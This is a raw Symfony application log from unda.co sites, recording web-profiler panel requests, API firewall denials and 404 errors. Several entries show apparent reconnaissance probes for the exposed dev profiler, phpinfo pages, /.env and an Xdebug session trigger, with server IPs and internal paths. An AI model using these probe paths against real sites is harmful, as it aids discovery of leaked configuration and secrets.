[2025-12-20 10:24:19] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /symfony/public/_profiler/phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /symfony/public/_profiler/phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 10:25:49] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1f3fa8","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/1f3fa8?panel=db","method":"GET"} []
[2025-12-20 10:25:49] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
[2025-12-20 10:26:24] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-20 10:26:27] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"15095c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/15095c","method":"GET"} []
[2025-12-20 10:26:27] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-20 10:26:55] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-20 10:30:14] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5ebd67","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/5ebd67","method":"GET"} []
[2025-12-20 10:30:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-20 10:30:28] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d3b11a","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/d3b11a","method":"GET"} []
[2025-12-20 10:30:28] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-20 10:34:29] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"879f21","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/879f21?panel=form","method":"GET"} []
[2025-12-20 10:34:29] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
[2025-12-20 10:35:14] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-20 10:35:27] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-20 10:36:20] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5ebd67","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/5ebd67?panel=config","method":"GET"} []
[2025-12-20 10:36:20] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-20 10:39:45] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"00ba25","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/00ba25?panel=time","method":"GET"} []
[2025-12-20 10:39:45] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-20 10:45:27] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"32464c","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/32464c?panel=logger","method":"GET"} []
[2025-12-20 10:45:27] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
[2025-12-20 10:45:28] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-20 10:45:29] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-20 10:45:41] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"b839f8","_route":"_wdt"},"request_uri":"https://web.unda.co/_wdt/b839f8","method":"GET"} []
[2025-12-20 10:52:36] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-20 10:53:09] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"00ba25","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/00ba25?panel=security","method":"GET"} []
[2025-12-20 10:53:09] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-20 11:01:53] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://auth.unda.co/_profiler/phpinfo","method":"GET"} []
[2025-12-20 11:03:16] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f8d329","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/f8d329?panel=validator","method":"GET"} []
[2025-12-20 11:03:16] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
[2025-12-20 11:04:46] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"260090","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/260090?panel=time","method":"GET"} []
[2025-12-20 11:04:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-20 11:05:57] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/?XDEBUG_SESSION_START=phpstorm","method":"GET"} []
[2025-12-20 11:06:03] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"00ba25","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/00ba25?panel=config","method":"GET"} []
[2025-12-20 11:06:03] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-20 11:06:22] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
[2025-12-20 11:06:22] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-20 11:06:22] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 11:06:22] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 11:06:22] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-20 11:06:22] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-20 11:06:22] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-20 11:06:24] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://api.unda.co/_profiler/phpinfo","method":"GET"} []
[2025-12-20 11:06:24] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-20 11:06:24] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 11:06:24] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 11:06:24] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-20 11:06:24] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-20 11:06:24] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-20 11:06:25] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
[2025-12-20 11:06:25] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-20 11:06:25] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 11:06:25] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 11:06:25] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-20 11:06:25] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-20 11:06:25] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-20 11:06:28] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://api.unda.co/_profiler/phpinfo","method":"GET"} []
[2025-12-20 11:06:28] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-20 11:06:28] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 11:06:28] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 11:06:28] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-20 11:06:28] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-20 11:06:28] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-20 11:06:30] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 11:06:34] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
[2025-12-20 11:06:34] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-20 11:06:34] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 11:06:34] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 11:06:34] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-20 11:06:34] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-20 11:06:34] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-20 11:06:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /symfony/public/_profiler/phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /symfony/public/_profiler/phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 11:06:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 11:06:46] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5ebd67","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/5ebd67","method":"GET"} []
[2025-12-20 11:06:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-20 11:06:48] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
[2025-12-20 11:06:48] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-20 11:06:48] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 11:06:48] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 11:06:48] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-20 11:06:48] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-20 11:06:48] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-20 11:06:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /symfony/public/_profiler/phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /symfony/public/_profiler/phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 11:07:03] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://api.unda.co/_profiler/phpinfo","method":"GET"} []
[2025-12-20 11:07:03] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-20 11:07:03] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 11:07:03] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 11:07:03] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-20 11:07:04] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-20 11:07:04] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-20 11:07:13] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 11:07:19] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
[2025-12-20 11:07:19] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-20 11:07:19] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 11:07:19] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 11:07:19] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-20 11:07:19] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-20 11:07:19] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-20 11:07:21] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /symfony/public/_profiler/phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /symfony/public/_profiler/phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 11:07:44] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"fbcff2","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/fbcff2?panel=request","method":"GET"} []
[2025-12-20 11:07:44] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-20 11:08:13] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"fb5734","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/fb5734?panel=logger","method":"GET"} []
[2025-12-20 11:08:13] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
[2025-12-20 11:09:22] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"cb60d4","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/cb60d4","method":"GET"} []
[2025-12-20 11:09:22] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-20 11:10:04] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"f8d329","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/f8d329/search/results?ip=146.19.24.116&limit=10","method":"GET"} []
[2025-12-20 11:10:04] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=146.19.24.116&limit=10","method":"GET"} []
[2025-12-20 11:10:28] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-20 11:11:06] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 11:11:08] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
[2025-12-20 11:13:14] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
[2025-12-20 11:13:14] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-20 11:13:14] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 11:13:14] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 11:13:14] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-20 11:13:14] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-20 11:13:14] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-20 11:13:16] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://api.unda.co/_profiler/phpinfo","method":"GET"} []
[2025-12-20 11:13:16] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-20 11:13:16] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 11:13:16] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 11:13:16] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-20 11:13:16] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-20 11:13:16] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-20 11:13:20] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
[2025-12-20 11:13:20] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-20 11:13:20] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 11:13:20] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
